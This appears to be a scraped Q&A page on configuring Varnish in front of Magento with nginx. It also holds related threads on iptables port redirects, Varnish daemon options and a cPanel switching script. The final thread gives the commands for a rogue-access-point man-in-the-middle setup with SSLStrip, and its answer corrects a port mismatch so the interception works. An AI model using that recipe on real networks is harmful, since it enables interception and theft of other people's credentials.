Magento, Plesk and Varnish - magento

I am running the following setup:
Magento 1.9.3.1
Varnish 3.0.5-2 - package installed from here https://www.magentocommerce.com/magento-connect/turpentine-varnish-cache.html
Ubuntu 14.04
Plesk 17.0.17
I have installed both varnish on the server and the plugin within magento, saved the configuration properly (from magento admin), however I am missing a configuration setting somewhere since the Varnish headers do not show up.
/etc/default/varnish has the following content:
DAEMON_OPTS="-a :443 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,8192m \
-p esi_syntax=0x2 \
-p cli_buffer=16384"
I did set it up to listen on 443 because the website has an SSL certificate.
When I try to see who is listening on 443 with netstat -ntlp | grep -w 443 I get the following response:
tcp 0 0 91.250.103.173:443 0.0.0.0:* LISTEN 9171/nginx: worker
tcp6 0 0 :::443 :::* LISTEN 6109/varnishd
So in addition to this I tried to modify the port where nginx listens by setting the listening port to 444 like this listen 444 ssl;. It did not work.
When I try to see the headers with curl there is no X-Varnish header.
What am I missing?

DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,8192m \
-p esi_syntax=0x2 \
-p cli_buffer=16384"
You should change the listen port of nginx or Apache to 8080,
and in default.vcl change the backend port to 8080.

Related

redirection from port 443 to 8443 not working from external for standalone tomcat

I have an EC2 instance with CentOS and a Tomcat server running on it on port 8080.
My security group has an open port for HTTPS (443)
For the redirection I've added the following iptables rules:
iptables -A INPUT -i eth0 -p tcp --dport 443 -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --dport 8443 -j ACCEPT
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-ports 8443
sudo iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8443
Now I can connect from my instance to port 443 and get redirected to port 8443.
https://localhost
https://54.247.86.18 (elastic ip)
But from outside this doesn't work. If I connect to https://54.247.86.18 from a browser I get a "no server found" error.
Any ideas how to resolve it?

restarting httpd service in bash script not working

I created a bash script to switch between using Apache and Varnish
But the commands for restarting the httpd service have RECENTLY stopped working.
The script was working fine months ago.
#!/bin/bash
echo "Switching between Apache and Varnish cache"
if grep -Fxq "apache_port=0.0.0.0:80" /var/cpanel/cpanel.config
then
sed -i '/apache_port/c\apache_port=0.0.0.0:8080' /var/cpanel/cpanel.config
else
sed -i '/apache_port/c\apache_port=0.0.0.0:80' /var/cpanel/cpanel.config
fi
/usr/local/cpanel/whostmgr/bin/whostmgr2 --updatetweaksettings &&
/scripts/rebuildhttpdconf &&
service httpd restart &&
service varnish restart &&
echo "Done"
I don't know exactly why the restarting of httpd is not working.
What about using iptables port redirection instead?
Basically, you have your varnish and apache running on their own unprivileged ports concurrently and redirect all traffic to port 80 to varnish or apache on kernel level.
Let's run varnish on 0.0.0.0:6081 and apache on 0.0.0.0:8080 and play with these 2 command sets (as root or with sudo):
To switch traffic to apache (assuming we already have it directed to varnish):
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 && \
iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 6081
# The first command adds a rule to redirect all traffic on interface eth0 (adjust as needed) from port 80 to port 8080. The rule is added to the end of the rules list, so the already active rule redirecting traffic to 6081 is still in charge with higher priority.
# The second line deletes the rule redirecting traffic from port 80 to port 6081, so the new rule can come into effect. Moreover, it's executed only if the previous command (-A) finished successfully.
To switch it back to varnish:
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 6081 && \
iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
# Inverted rules from above: adds the redirection to 6081 and removes the redirection to 8080 if the addition was successful.
Pros:
No varnish restarts, so no cold cache.
No port 80 outage overall if you first add the new redirection rule and then delete still valid older one.
Much safer, if addition of the first rule fails, skip deleting still valid rule and report problem. You are still running as before failed attempt. Just play with scripts as needed.
Cons:
No cache eviction as there is no varnish restart. But I guess this is not the reason you try to switch traffic to apache. And you can evict varnish separately if you need to after all. :)
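The add-then-delete switch described in the answer above, as an added shell example that is not part of the original answer: it confirms the new rule with `iptables -C` before removing the old one and uses the documented `--to-ports` spelling. The `IPT` and `IFACE` variables and the function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original answer): swap the port-80 NAT
# REDIRECT between two local listeners, add-before-delete.
# IPT and IFACE are assumptions; override them to match the host.
IPT="${IPT:-iptables}"
IFACE="${IFACE:-eth0}"

# rule_spec PORT: print the rule arguments shared by -C, -A and -D.
rule_spec() {
    printf '%s' "PREROUTING -i $IFACE -p tcp --dport 80 -j REDIRECT --to-ports $1"
}

# switch_port80 NEW_PORT OLD_PORT
# returns 0: port 80 is redirected to NEW_PORT only
#         1: new rule could not be installed, old rule left untouched
#         2: new rule is present but the old rule could not be removed
switch_port80() {
    new=$1
    old=$2
    # Idempotent: append only when the rule is not already present.
    if ! $IPT -t nat -C $(rule_spec "$new") 2>/dev/null; then
        $IPT -t nat -A $(rule_spec "$new") || return 1
    fi
    # Confirm the new rule really exists before touching the old one.
    $IPT -t nat -C $(rule_spec "$new") 2>/dev/null || return 1
    # -D removes one matching rule per call, so loop over duplicates.
    while $IPT -t nat -C $(rule_spec "$old") 2>/dev/null; do
        $IPT -t nat -D $(rule_spec "$old") || return 2
    done
    return 0
}

# Usage (as root): switch_port80 8080 6081   # send port 80 to apache
#                  switch_port80 6081 8080   # send port 80 back to varnish
```

Both daemons listen on 0.0.0.0 in this setup, so ports 6081 and 8080 remain directly reachable from outside unless they are filtered separately.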

varnish cli_buffer value not saved after updated /etc/default/varnish.vcl

I have been trying this since yesterday but no success. I have debian 8, nginx and varnish 4.0.2
I want to update varnish cli_buffer value from 8k to 16k. Following is my /etc/varnish/default.vcl configuration.
default.vcl
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-p cli_buffer=16384 \
-p feature=+esi_ignore_other_elements \
-p vcc_allow_inline_c=on \
-s malloc,256m"
I'm lost where to update now. Any suggestions ? Thanks in advance.
What you are showing is the Varnish daemon options for the file /etc/default/varnish but you seem to have put that information in the /etc/varnish/default.vcl which will not work. The default.vcl file is for the Varnish configuration (not the daemon startup).

start varnish instance with -p

I would like to know how to start Varnish instance with "-p cli_buffer 10000".
Is the following command the right way?
service varnish reload -p cli_buffer=10000
You can put this in /etc/default/varnish configuration file
As mentioned before, place this in your config file instead. The config is located at /etc/default/varnish on Ubuntu.
DAEMON_OPTS="-a :80 \
-T :6083 \
-f /etc/varnish/default.vcl \
-n varnish \
-s malloc,5G \
-p esi_syntax=0x1 \
-p cli_buffer=10000"

SSLStrip not working for me

I am having trouble with SSLStrip in a MITM Setup with Backtrack 5. I am using an external wireless card to broadcast the wireless signal, and routing through an Ethernet. I am successfully viewing the packets in Wireshark, however I would like to view SSL data using SSLStrip. These are the preliminary commands I use to set up MITM.
airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0
--new Terminal--
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward
At this point, I can view packet data in WireShark. I follow these steps to set up SSLStrip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080
When I am finished with the session and I open sslstrip.log I do not see any data written to the file. Also, I am unable to access the internet once I do the iptables redirect. Please let me know what you think the problem might be.
Assuming sslstrip and arp poisoning are up and running you have a problem with port redirection.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
redirects http traffic to 127.0.0.1 port 666.
cd /pentest/web/sslstrip
sslstrip -l 8080
starts sslstrip listening for incoming traffic on port 8080
You can either change the port redirection to 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
or change the listening port to 666
sslstrip -l 666
